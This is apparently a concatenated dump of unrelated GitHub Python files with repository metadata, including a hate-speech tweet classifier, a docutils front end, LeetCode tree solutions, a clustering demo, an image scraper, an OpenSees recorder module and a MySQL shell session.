        matrix_proportions[i, :] = cm[i, :] / float(cm[i, :].sum())
    names = ['Hate', 'Offensive', 'Neither']
    confusion_df = pd.DataFrame(matrix_proportions, index=names, columns=names)
    plt.figure(figsize=(5, 5))
    seaborn.heatmap(confusion_df, annot=True, annot_kws={"size": 12},
                    cmap='gist_gray_r', cbar=False, square=True, fmt='.2f')
    plt.ylabel(r'\textbf{True categories}', fontsize=14)
    plt.xlabel(r'\textbf{Predicted categories}', fontsize=14)
    plt.tick_params(labelsize=12)
    if save_cm:
        # Collapse the duplicated save branches: default the path once.
        if save_path is None:
            save_path = 'data/confusion.png'
        plt.savefig(save_path)
        print(f'Confusionmatrix was saved to {save_path}')
    plt.show()
# In[5]:
# Data Structure
class TweetsDataset:
    """Tweets dataset: builds TF-IDF, POS-tag and hand-crafted feature matrices.

    Reads the CSV at ``csv_path`` and exposes:

    * ``features`` -- horizontal concatenation of word n-gram TF-IDF scores,
      POS-tag n-gram counts, and the ``other_features`` values (one row per tweet).
    * ``feature_names`` -- column names aligned with ``features``.
    * ``labels`` -- the ``class`` column of the CSV.
    """

    def __init__(self, csv_path, tokenizer_name, use_stopwords = True, use_preprocessor= False, min_df = 10, max_df = 0.75, max_ngram = 3):
        # Where data is stored
        self.csv_path = csv_path
        # Read data directly
        self.dataframe = pd.read_csv(self.csv_path)
        # Choose tokenizer
        if tokenizer_name == 'casual_std':
            func = lambda x: casual_tokenize(x, preserve_case=True, reduce_len=False, strip_handles=False)
            self.tokenizer = func
        elif tokenizer_name == 'casual_reduce':
            func = lambda x: casual_tokenize(x, preserve_case=False, reduce_len=True, strip_handles=True)
            self.tokenizer = func
        elif tokenizer_name == 'words':
            self.tokenizer = tokenize_words
        elif tokenizer_name == 'orig':
            self.tokenizer = tokenize
        else:
            raise NotImplementedError('Unknown tokenizer')
        # Stopwords
        if use_stopwords:
            # BUG FIX: list.extend() returns None, so the original
            # ``words("english").extend([...])`` assigned None and the
            # vectorizer effectively received no stop words.  Build the
            # list first, then extend it with Twitter-specific tokens.
            stopwords = nltk.corpus.stopwords.words("english")
            stopwords.extend(["#ff", "ff", "rt"])
            self.stopwords = stopwords
        else:
            self.stopwords = None
        # Preprocessor
        if use_preprocessor:
            self.preprocessor = preprocess
        else:
            self.preprocessor = None
        # Some hyperparameters
        self.min_df = min_df
        self.max_df = max_df
        self.max_ngram = max_ngram
        # Vectorizer for word n-grams (TF-IDF weighted)
        self.vectorizer = TfidfVectorizer(
            tokenizer=self.tokenizer,  # casual_tokenize_specified,
            preprocessor=self.preprocessor,
            ngram_range=(1, self.max_ngram),
            stop_words=self.stopwords,
            use_idf=True,
            smooth_idf=False,
            norm=None,
            decode_error='replace',
            max_features=10000,
            min_df=self.min_df,
            max_df=self.max_df
        )
        # Vectorizer for POS-tag n-grams (raw counts: use_idf=False, no norm)
        self.pos_vectorizer = TfidfVectorizer(
            tokenizer=None,
            lowercase=False,
            preprocessor=None,
            ngram_range=(1, self.max_ngram),
            stop_words=None,
            use_idf=False,
            smooth_idf=False,
            norm=None,
            decode_error='replace',
            max_features=5000,
            min_df=5,
            max_df=0.75,
        )
        # Construct tfidf matrix and get relevant scores
        self.tfidf = self.vectorizer.fit_transform(self.dataframe['tweet']).toarray()
        self.vocab = {v: i for i, v in enumerate(self.vectorizer.get_feature_names())}
        self.idf_vals = self.vectorizer.idf_
        self.idf_dict = {i: self.idf_vals[i] for i in self.vocab.values()}
        print(f'A vocab was created. It consists of {len(self.vocab)} entries')
        # POS-tagging: tag each tweet, then vectorize the tag sequences
        self.tweet_tags = [pos_tag_tweet(tweet, self.tokenizer, print_tweet=False) for tweet in self.dataframe['tweet']]
        self.pos = self.pos_vectorizer.fit_transform(pd.Series(self.tweet_tags)).toarray()
        self.pos_vocab = {v: i for i, v in enumerate(self.pos_vectorizer.get_feature_names())}
        # Other features: this is untouched
        self.feats = get_feature_array(self.dataframe['tweet'])
        # Now join them all up
        self.features = np.concatenate([self.tfidf, self.pos, self.feats], axis=1)
        self.feature_names = [k for k,_ in self.vocab.items()]+[k for k,_ in self.pos_vocab.items()]+["FKRA", "FRE","num_syllables", "avg_syl_per_word", "num_chars", "num_chars_total", "num_terms", "num_words", "num_unique_words", "vader neg","vader pos","vader neu", "vader compound", "num_hashtags", "num_mentions", "num_urls", "is_retweet"]
        self.labels = self.dataframe['class']
        print(f'\n Data has been processed and is now available. Feature dim: {self.features.shape}')
| [
"58326589+carstengieshoff@users.noreply.github.com"
] | 58326589+carstengieshoff@users.noreply.github.com |
003bdc64d2887c85bbcf686d048131d20e7ac8d5 | d34d0bb4497c14b6433d303e557895ab926e1717 | /lib/bin/rstpep2html.py | bd8256da8484511c241ec36ab35aa68d527b0bd5 | [] | no_license | mujahed85/gcp-ml-wav | 6f24a17140e39a60f0e8adb2bccd020864f84b37 | f7cd6adb8fbbbd5d2d4eed009ee62f9b51fd2d12 | refs/heads/master | 2020-07-05T06:00:04.558778 | 2019-08-22T18:13:41 | 2019-08-22T18:13:41 | 202,544,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | #!/home/sandyreddy_it4/15aug/appengine-helloworld-python-master/venv/bin/python2.7
# $Id: rstpep2html.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing HTML from PEP
(Python Enhancement Proposal) documents.
"""
# Set the user's preferred locale so Docutils formats dates/numbers
# appropriately; a missing or misconfigured locale must not stop the tool.
try:
    import locale
    locale.setlocale(locale.LC_ALL, '')
except Exception:
    # FIX: was a bare ``except:``, which would also swallow
    # SystemExit/KeyboardInterrupt.  Fall back to the default "C" locale.
    pass

from docutils.core import publish_cmdline, default_description

description = ('Generates (X)HTML from reStructuredText-format PEP files. '
               + default_description)

# Command-line front end: parse argv and convert PEP-style reST to HTML.
publish_cmdline(reader_name='pep', writer_name='pep_html',
                description=description)
| [
"mujahed.mca@gmail.com"
] | mujahed.mca@gmail.com |
b170bf1a5dd2f6564204d32a76592625f9e5c628 | ac7c02f29a837fdd67d2bdc77bba182080e98ed8 | /codekata/3rdcharacters.py | ce51088ffcd802a6c7f48e27801cff822fabc6db | [] | no_license | YaminiNarayanan-359/guvi | 7630c309a86365e4367fda1ddab4e966e7d1ac5b | a52b6353100b4e9b83a003e6a327fbfb174daac4 | refs/heads/master | 2020-06-03T00:08:00.389609 | 2019-07-16T06:59:53 | 2019-07-16T06:59:53 | 191,355,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | d=input()
for i in range(0, len(d)):
    # Print every 3rd character of the input (indices 0, 3, 6, ...).
    if i % 3 == 0:
        # FIX: the original printed the undefined name ``k`` (NameError);
        # the intended value is the character of d at this index.
        print(d[i], end="")
| [
"noreply@github.com"
] | YaminiNarayanan-359.noreply@github.com |
1650c2935a075c9cb78b47b63d329943587999d2 | 8e4a2a7152e4b25641d72e930de8842732bcf53a | /SNAPOTT/04FrameworkPushOver/python/recorder.py | e964ef9584a7a78f411e7f7776a69321d95e79c5 | [] | no_license | Mengsen-W/OpenSeesFiles | 9b9e8865a2b802047e419c5155aff5c20ac05937 | cda268d37cd17280dc18ada8c7f1b30af0b2bd6b | refs/heads/master | 2021-12-23T23:21:28.369076 | 2021-12-22T13:14:53 | 2021-12-22T13:14:53 | 239,237,550 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,512 | py | '''
* @Description: recorder
* @Author: Mengsen.Wang
* @Date: 2020-05-29 15:27:00
* @Last Modified by: Mengsen.Wang
* @Last Modified time: 2020-05-29 15:27:00
'''
import os
import openseespy.opensees as ops
from log import logger
def recorder_create(filedir="output"):
    '''
    recorder create\n
    Para: filedir default ./output

    Registers OpenSees recorders for element local forces, node
    displacements and section deformations; the *.out files are written
    under ``filedir`` inside the current working directory.
    '''
    # there is no recorder in element with 'section'
    # FIX: build paths with os.path.join instead of hard-coded "\\"
    # separators so the function also works on non-Windows platforms.
    outdir = os.path.join(os.getcwd(), filedir)

    def _out(name):
        # Full path of one output file inside the output directory.
        return os.path.join(outdir, name)

    ops.recorder('Element', '-file', _out('ele0.out'),
                 '-time', '-eleRange', 1, 47, 'localForce')
    ops.recorder('Node', '-file', _out('node0.out'), '-time',
                 '-nodeRange', 1, 28, '-dof', 1, 2, 3, 'disp')
    ops.recorder('Node', '-file', _out('node8.out'),
                 '-time', '-node', 8, '-dof', 1, 2, 3, 'disp')
    ops.recorder('Node', '-file', _out('node7.out'),
                 '-time', '-node', 7, '-dof', 1, 2, 3, 'disp')
    ops.recorder('Node', '-file', _out('node12.out'),
                 '-time', '-node', 12, '-dof', 1, 2, 3, 'disp')
    ops.recorder('Node', '-file', _out('node20.out'),
                 '-time', '-node', 20, '-dof', 1, 2, 3, 'disp')
    ops.recorder('Element', '-file', _out('ele0_sec1d.out'),
                 '-time', '-eleRange', 1, 47, 'section', 1, 'deformation')
    ops.recorder('Element', '-file', _out('ele0_sec3d.out'),
                 '-time', '-eleRange', 1, 47, 'section', 4, 'deformation')
    logger.info("recoder created")
| [
"mengsen_wang@163.com"
] | mengsen_wang@163.com |
452e5e6b02de1e49f606a3ca71389a5b1c0c71f7 | 3654f75d57d47de0613a7d506e727f5ce306081a | /使用协程下载斗鱼首页中所有的图片.py | 8ed93808f4c14a74b7fc62d23e5c779a88074c37 | [] | no_license | YuZiHao666/douyuPaChong | 98b158250bb28ee5dd2ea6e5a811f35fead50ffd | 2de23e0976cb0e9ca6ce584ae2b7696484c72cdd | refs/heads/master | 2021-04-27T00:04:52.647278 | 2018-03-04T01:58:48 | 2018-03-04T01:58:48 | 123,747,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,604 | py | import urllib.request
import re
max_retry_count = 3
def down_img(url):
"""https://rpic.douyucdn.cn/live-cover/appCovers/2017/10/24/12017.jpg"""
for i in range(max_retry_count):
try:
response = urllib.request.urlopen(url)
# bytes
data = response.read()
# 从url中得到文件名
file_name = url[url.rfind('/')+1:]
# 打开文件用以写入
with open("img/"+ file_name, "wb") as file:
file.write(data)
except Exception as e:
print("出错 %s 正在重试" % e)
else:
break
if __name__ == '__main__':
home = """http://www.58pic.com/"""
# 请求的时候需要带上头部 可以防止初步的反爬措施
headers = {
"Host":"www.58pic.com",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
}
# 构造好请求对象 将请求提交到服务器 获取的响应就是到首页的html代码
request = urllib.request.Request(url=home, headers=headers)
# urlopen函数可以直接传入url网址 也可以指定好一个请求对象
response = urllib.request.urlopen(request)
# 将收到的响应对象中数据的bytes数据读出出来 并且解码
html_data = response.read().decode()
# 使用正则 从首页网页中 提取出所有的图片链接
img_list = re.findall(r"http://.*?\.(?:jpg|png|gif)", html_data)
print(img_list)
for img_url in img_list:
down_img(img_url) | [
"your_email@154813536@qq.com"
] | your_email@154813536@qq.com |
520d8b4de76bc22b176016cd250e44aa8922ed31 | 3a8c2bd3b8df9054ed0c26f48616209859faa719 | /Challenges/binaryTreeRightSideView.py | 5ba301ff4e30397260ef87ec8389c5ebedd932f9 | [] | no_license | AusCommsteam/Algorithm-and-Data-Structures-and-Coding-Challenges | 684f1ca2f9ee3c49d0b17ecb1e80707efe305c82 | 98fb752c574a6ec5961a274e41a44275b56da194 | refs/heads/master | 2023-09-01T23:58:15.514231 | 2021-09-10T12:42:03 | 2021-09-10T12:42:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | """
Binary Tree Right Side View
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
"""
Time Complexity O(N)
Space Complexity O(N)
"""
class Solution:
def rightSideView(self, root: TreeNode) -> List[int]:
if not root:
return []
ans = [root.val]
left = ans + self.rightSideView(root.left)
right = ans + self.rightSideView(root.right)
if len(right) > len(left):
return right
return right + left[len(right):]
"""
BFS
"""
from collections import deque
class Solution:
def rightSideView(self, root):
if not root:
return []
q, res = deque([root]), []
while q:
res.append(q[-1].val)
for _ in range(len(q)):
cur = q.popleft()
if cur.left:
q.append(cur.left)
if cur.right:
q.append(cur.right)
return res
| [
"bennyhwanggggg@users.noreply.github.com"
] | bennyhwanggggg@users.noreply.github.com |
c63925b4f49420c2678dd91c07d5abf368b8d26c | d26947e52adb2bf46c707fb392ef4e8de270c250 | /python/venv/bin/easy_install | 6c3edb735d0ced379a4aaa0bb3729cd83149088c | [
"MIT"
] | permissive | valer23/robot | 1df8182b14873f8f315ed4d95e242cc788f27c51 | 23bc23e8d699c449e6150ce24ed7a083180734b2 | refs/heads/master | 2020-07-30T20:53:25.623295 | 2019-09-24T07:45:28 | 2019-09-24T07:45:28 | 210,352,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | #!/home/valerian/Proj_maj/test_python/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"valerian.bart@gmail.com"
] | valerian.bart@gmail.com | |
da7780b102a9f8cfb62380fdbba97429eb064418 | 9f0704a088c7af65412f63208e0b9cf4d619de80 | /Clustering/Hierarchical_Clustering/hierarchical_clustering.py | a773672b87827eecc360f7dca604912399de3fa7 | [] | no_license | ChavezCitlalli/MachineL. | 6b34fdb50ade9b9ce0f5fe2946cbe25b9d886b08 | f0ce7b961783a2ea27f04feacdd1ad9b992fc697 | refs/heads/master | 2023-07-02T00:38:06.137753 | 2021-08-09T17:48:43 | 2021-08-09T17:48:43 | 394,386,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Mall_Customers.csv')
X = dataset.iloc[:, [3, 4]].values
# y = dataset.iloc[:, 3].values
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))
plt.title('Dendrogram')
plt.xlabel('Customers')
plt.ylabel('Euclidean distances')
plt.show()
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward')
y_hc = hc.fit_predict(X)
# Visualising the clusters
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
| [
"zaydacit@hotmail.com"
] | zaydacit@hotmail.com |
3f343c058cf96d33a5d3b5c7981b91edc0493874 | 7773ea6f465ffecfd4f9821aad56ee1eab90d97a | /python/testData/surround/SurroundWithWhile_after.py | 43e32582970098345e4768f7e4af14d29e5282d9 | [
"Apache-2.0"
] | permissive | aghasyedbilal/intellij-community | 5fa14a8bb62a037c0d2764fb172e8109a3db471f | fa602b2874ea4eb59442f9937b952dcb55910b6e | refs/heads/master | 2023-04-10T20:55:27.988445 | 2020-05-03T22:00:26 | 2020-05-03T22:26:23 | 261,074,802 | 2 | 0 | Apache-2.0 | 2020-05-04T03:48:36 | 2020-05-04T03:48:35 | null | UTF-8 | Python | false | false | 76 | py | def foo():
while <selection>True</selection>:
print "hello"
| [
"yole@jetbrains.com"
] | yole@jetbrains.com |
177e0fb844c10dfa74004b38b345e8812b831e03 | 0ce9226dc0622e1edd93e57dcf2e88eaf77cedd6 | /leetcode/explore/October/11_subsquence_disnct.py | f9dff5ee942c4736487a7c15ad7c7a7aeeb83767 | [] | no_license | minhthe/algo-and-ds-practice | 6b09fc2174d58f8ba39ceabd80e2525ab95fe7ea | 3a9b882af8412859f204569ca11808b638acf29d | refs/heads/master | 2023-01-31T18:49:31.773115 | 2020-12-18T06:26:47 | 2020-12-18T06:26:47 | 298,933,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | '''
Greading approach: if the char you want to add, and this char not the last,
-> consider will add later not NOT to achive lexicographical order
'''
class Solution:
def removeDuplicateLetters(self, s: str) -> str:
last_index = {c: i for i,c in enumerate(s)}
stk = []
for i, c in enumerate(s):
if c in stk: continue
while stk and stk[-1] > c and last_index[stk[-1]] > i:
stk.pop()
stk.append(c)
return ''.join(stk) | [
"minhthe.007@gmail.com"
] | minhthe.007@gmail.com |
38ae7891771e0d7a34e5992b2f10f7d7e243b10b | 28162b53e25817f00c8d91a1d41c0bf0c8f861d1 | /tala_project/wsgi.py | d6e797136534217944eee05acbe8b7ba3dc8459c | [] | no_license | TiredPhilosophile/tala_v2 | 668d8dcbfe575a631ed220560f53c4abc983237a | 2fd675100090abe38f3cdca5f6dbe6cdca823a32 | refs/heads/master | 2021-01-15T13:19:41.353312 | 2015-06-11T05:02:37 | 2015-06-11T05:02:37 | 36,107,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | """
WSGI config for tala_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tala_project.settings")

from django.core.wsgi import get_wsgi_application
from dj_static import Cling

# Wrap the standard Django WSGI application in dj-static's Cling so the
# app also serves its static files (useful on Heroku-style hosts).
# (Removed the commented-out duplicate import/application lines.)
application = Cling(get_wsgi_application())
| [
"hashimchau@gmail.com"
] | hashimchau@gmail.com |
8ce4f5afef09eb0a197dfb39a5bd0108bbf94797 | 9153dab91ab4a897059e1f92a22cc2d92d49aa21 | /helloworld.py | 169864d82d1d62954ae57358caaafc9e3b8a4bc2 | [] | no_license | mksekibang/BCN48 | d10bdff9410c62b71af961f50f3bd73c0b6b24e2 | c08c4c2f4987923e03bb9bd12559f7fccf2253d0 | refs/heads/master | 2020-06-06T16:26:50.809993 | 2012-11-06T01:09:02 | 2012-11-06T01:09:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,691 | py | #!-*- coding:utf-8 -*-"
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.ext import db
import os
import voting
import crpt
class MainPage(webapp.RequestHandler):
    """Handler for the voting page: renders the entry form and processes votes."""
    def get(self):
        """Render the empty voting form (write.html)."""
        params = {
            'Title':'BCN48第1回総選挙!!!',
            'form':voting.votingform()
        }
        fpath = os.path.join(os.path.dirname(__file__),'htmldir','write.html')
        html = template.render(fpath,params)
        self.response.out.write(html)
    def post(self):
        """Validate the submitted vote and its serial code; render a preview
        on success, or the entry form with an error message otherwise."""
        form = voting.votingform(self.request.POST)
        # Default parameters: shown when form validation fails
        # (the Title string says required fields are missing).
        params = {
            'Title':'入力エラーです。未入力の必須項目があります',
            'form':form
        }
        if form.is_valid():
            entity = form.save(commit=False)
            ErrorFlg = False
            ErrorMsg = ""
            # Check the serial code length (a serial code is 16 characters).
            if len(entity.serialno) <> 16:
                ErrorFlg = True
                ErrorMsg = "シリアルコードの桁数が間違っています。"
            else:
                # Reject serial codes that have already been used to vote.
                serial_check = voting.votingdata.gql("WHERE serialno = :checkno",checkno = entity.serialno)
                if serial_check.count() == 0:
                    # Decrypt the serial code and range-check the result.
                    # NOTE(review): these are lexicographic *string*
                    # comparisons, not numeric ones -- confirm the intended
                    # range of values returned by crpt.DecryptionMessage.
                    serial_decrypt = crpt.DecryptionMessage(entity.serialno)
                    if serial_decrypt > '00000000' and serial_decrypt < '100000000':
                        # Valid vote: show the confirmation preview page.
                        params = {
                            'name': entity.name,
                            'serialno': entity.serialno
                        }
                        fpath = os.path.join(os.path.dirname(__file__),'htmldir','preview.html')
                    else:
                        ErrorFlg = True
                        ErrorMsg = "不正なシリアルコードです。"
                else:
                    ErrorFlg = True
                    ErrorMsg = "すでに使用済みのシリアルコードです。"
            if ErrorFlg:
                # Re-render the entry form with the error message as the title.
                params = {
                    'Title':ErrorMsg,
                    'form':voting.votingform()
                }
                fpath = os.path.join(os.path.dirname(__file__),'htmldir','write.html')
        else:
            # Form validation failed: re-render the form with default params.
            fpath = os.path.join(os.path.dirname(__file__),'htmldir','write.html')
        html = template.render(fpath,params)
        self.response.out.write(html)
# WSGI application routing "/" to MainPage; debug=True shows tracebacks in the browser.
application = webapp.WSGIApplication([('/', MainPage)], debug=True)
def main():
    """Serve the WSGI application through the CGI adapter."""
    run_wsgi_app(application)

if __name__ == "__main__":
    main()
| [
"dmitryshostakovich@gmail.com"
] | dmitryshostakovich@gmail.com |
f82b2ec22562e35971d6fe6f982dd9bbbb0b9b5c | 6663cffcb75cc2433c1eaae7e92ccd2977cd8f19 | /connect to mysql.py | 862ab8554332aa64f9aea62ee67ec2dac13a8626 | [] | no_license | LennyLenny/python-file | 8440680944bebcfdad6e5759f4c4c36a4dc0e086 | b06fd6fb156f478a21c4d61062a382adf287fa7d | refs/heads/master | 2020-04-28T03:17:58.023664 | 2019-03-11T05:31:28 | 2019-03-11T05:31:28 | 174,931,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | Python 3.6.3 (v3.6.3:2c5fed8, Oct 3 2017, 17:26:49) [MSC v.1900 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> import pymysql
>>> conn = pymysql.connect(host='localhost',user='root',password='root',db='movielist')
>>> a = conn.cursor()
>>> sql = 'SELECT * from `movie_rate`;'
>>> a.execute(sql)
Traceback (most recent call last):
File "<pyshell#4>", line 1, in <module>
a.execute(sql)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 166, in execute
result = self._query(query)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 322, in _query
conn.query(q)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 856, in query
self._affected_rows = self._read_query_result(unbuffered=unbuffered)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1057, in _read_query_result
result.read()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1340, in read
first_packet = self.connection._read_packet()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1014, in _read_packet
packet.check_error()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 393, in check_error
err.raise_mysql_exception(self._data)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\err.py", line 107, in raise_mysql_exception
raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'movielist.movie_rate' doesn't exist")
>>> print(sql)
SELECT * from `movie_rate`;
>>> a.execute(sql)
Traceback (most recent call last):
File "<pyshell#6>", line 1, in <module>
a.execute(sql)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 166, in execute
result = self._query(query)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\cursors.py", line 322, in _query
conn.query(q)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 856, in query
self._affected_rows = self._read_query_result(unbuffered=unbuffered)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1057, in _read_query_result
result.read()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1340, in read
first_packet = self.connection._read_packet()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 1014, in _read_packet
packet.check_error()
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\connections.py", line 393, in check_error
err.raise_mysql_exception(self._data)
File "C:\Users\ASUS\AppData\Local\Programs\Python\Python36-32\lib\site-packages\pymysql\err.py", line 107, in raise_mysql_exception
raise errorclass(errno, errval)
pymysql.err.ProgrammingError: (1146, "Table 'movielist.movie_rate' doesn't exist")
>>> sql = 'SELECT * from `user_info`;'
>>> a.execute(sql)
3
>>>
| [
"791086166@qq.com"
] | 791086166@qq.com |
cda6a6e5e1b60598a1893d844bcba02707ddbbb7 | 282d0a84b45b12359b96bbf0b1d7ca9ee0cb5d19 | /Malware1/venv/Lib/site-packages/scipy/spatial/setup.py | 17994e6fb084330c7b91f8e312a70465a528a0ff | [] | no_license | sameerakhtar/CyberSecurity | 9cfe58df98495eac6e4e2708e34e70b7e4c055d3 | 594973df27b4e1a43f8faba0140ce7d6c6618f93 | refs/heads/master | 2022-12-11T11:53:40.875462 | 2020-09-07T23:13:22 | 2020-09-07T23:13:22 | 293,598,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:ccb99ae81e55c20bfd073d894471ea6c5a51f1cc27e19fea1bd2ebdfa959f8cd
size 2935
| [
"46763165+sameerakhtar@users.noreply.github.com"
] | 46763165+sameerakhtar@users.noreply.github.com |
121d743af8ee8b7ac6eff95e4756e10c11b93dfc | 78e93ca71a54bd11b6f51ef3936044e08782c7e3 | /batchkit_examples/speech_sdk/work_item_processor.py | cb1108528d05baf51c553dc4922e2052d930bdf2 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | microsoft/batch-processing-kit | c0134e1e395fdf7f2938101cea542dbb8d3c1f1f | 8b0a5492361ff9473ab66c2f64aaccd5340f2f62 | refs/heads/master | 2023-09-02T01:54:36.226987 | 2022-10-27T03:40:34 | 2022-10-27T03:40:34 | 265,635,442 | 29 | 19 | MIT | 2023-06-02T10:38:06 | 2020-05-20T17:14:45 | Python | UTF-8 | Python | false | false | 1,170 | py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import multiprocessing
from typing import List
from batchkit.logger import LogEventQueue
from batchkit.work_item import WorkItemRequest, WorkItemResult
from batchkit.work_item_processor import WorkItemProcessor
from batchkit_examples.speech_sdk.recognize import run_recognizer
from batchkit_examples.speech_sdk.work_item import SpeechSDKWorkItemRequest
class SpeechSDKWorkItemProcessor(WorkItemProcessor):
def __init__(self):
super().__init__()
def work_item_types(self) -> List[type]:
return [SpeechSDKWorkItemRequest]
def process_impl(self,
work_item: WorkItemRequest,
endpoint_config: dict, rtf: float,
log_event_queue: LogEventQueue, cancellation_token: multiprocessing.Event,
global_workitem_lock: multiprocessing.RLock) -> WorkItemResult:
assert isinstance(work_item, SpeechSDKWorkItemRequest)
return run_recognizer(
work_item,
rtf,
endpoint_config,
log_event_queue,
cancellation_token
)
| [
"noreply@github.com"
] | microsoft.noreply@github.com |
66ff066deef611e0bc8dba47f853afe25757b4be | 62f14fe947513ddf1e4ca8c26ae5d02099abd6cc | /tests/test_compressible.py | a49ff3d21e1e7f78b038956e6e933a00ac0f8d32 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bencleary/fluids | 79d993366cea94a87cbc3ac3e5f01311fa81956e | b1d0e00877b36c14c52d7d32c45f9359c0366459 | refs/heads/master | 2022-11-08T02:47:02.896748 | 2020-06-20T14:41:10 | 2020-06-20T14:41:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,252 | py | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, 2017 Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from fluids import *
from fluids.numerics import assert_close, assert_close1d
import pytest
def test_isothermal_work_compression():
    # Isothermal compression work for 1 bar -> 10 bar at 300 K.
    W = isothermal_work_compression(1E5, 1E6, 300)
    assert_close(W, 5743.425357533477, rtol=1e-05)
def test_isentropic_work_compression():
    # Forward problem: specific work for ideal, inefficient and real-gas cases.
    cases = [
